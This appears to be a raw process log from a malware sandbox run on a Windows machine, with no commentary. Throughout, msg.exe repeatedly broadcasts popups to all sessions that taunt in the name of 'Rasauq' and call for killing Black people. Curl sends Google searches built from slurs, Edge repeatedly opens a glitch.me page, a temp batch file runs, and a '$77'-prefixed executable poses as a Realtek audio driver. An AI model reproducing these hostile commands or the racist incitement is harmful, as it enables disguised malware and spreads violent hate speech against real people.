"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9328,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10220 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=10392,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10416 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10648,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10672 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10864,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10880 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10640,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11032 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=11196,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11192 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11404,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11388 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11572,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11616 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11808 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11936,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11972 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC256.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=12104,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11832 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11924,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12188 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=12560,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12556 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12396,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12728 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12912,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=13060,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12856 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=13264,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13100,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13308 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13612,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13836,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13824 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=14008,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14036 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=14180,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14188 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=14376,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14404 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=14824,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14832 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14996,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15004 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=15268,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15276 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
